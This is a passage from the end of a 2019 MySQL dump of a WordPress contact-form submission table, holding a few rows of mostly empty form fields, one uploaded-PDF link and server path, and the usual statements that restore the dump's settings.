Africa&quot;}'),(12,54,13,8,'name','{&quot;title&quot;:&quot;Mr&quot;,&quot;first&quot;:&quot;&quot;,&quot;suffix&quot;:&quot;&quot;,&quot;last&quot;:&quot;&quot;}'),(13,54,13,9,'address','{&quot;street&quot;:&quot;&quot;,&quot;line2&quot;:&quot;&quot;,&quot;city&quot;:&quot;&quot;,&quot;state&quot;:&quot;&quot;,&quot;code&quot;:&quot;&quot;,&quot;country&quot;:&quot;South Africa&quot;}'),(14,54,13,11,'file-upload','[{\"name\":\"567 - 48229 - 94556 - CB Owner Private Arrangement New.pdf\",\"link\":\"http:\\/\\/companyregistration.online\\/wp-content\\/uploads\\/2016\\/03\\/567-48229-94556-CB-Owner-Private-Arrangement-New.pdf\",\"file\":\"\\/home\\/digit626\\/companyregistration.online\\/wp-content\\/uploads\\/2016\\/03\\/567-48229-94556-CB-Owner-Private-Arrangement-New.pdf\"}]');
/*!40000 ALTER TABLE `wpxb_wr_contactform_submission_data` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2019-08-29  3:03:07
